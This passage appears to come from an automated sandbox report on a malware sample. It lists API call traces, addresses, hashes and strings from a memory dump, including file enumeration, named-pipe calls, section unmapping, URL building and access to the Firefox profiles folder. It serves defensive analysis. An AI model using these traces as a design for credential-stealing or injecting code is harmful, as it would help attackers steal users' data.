    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
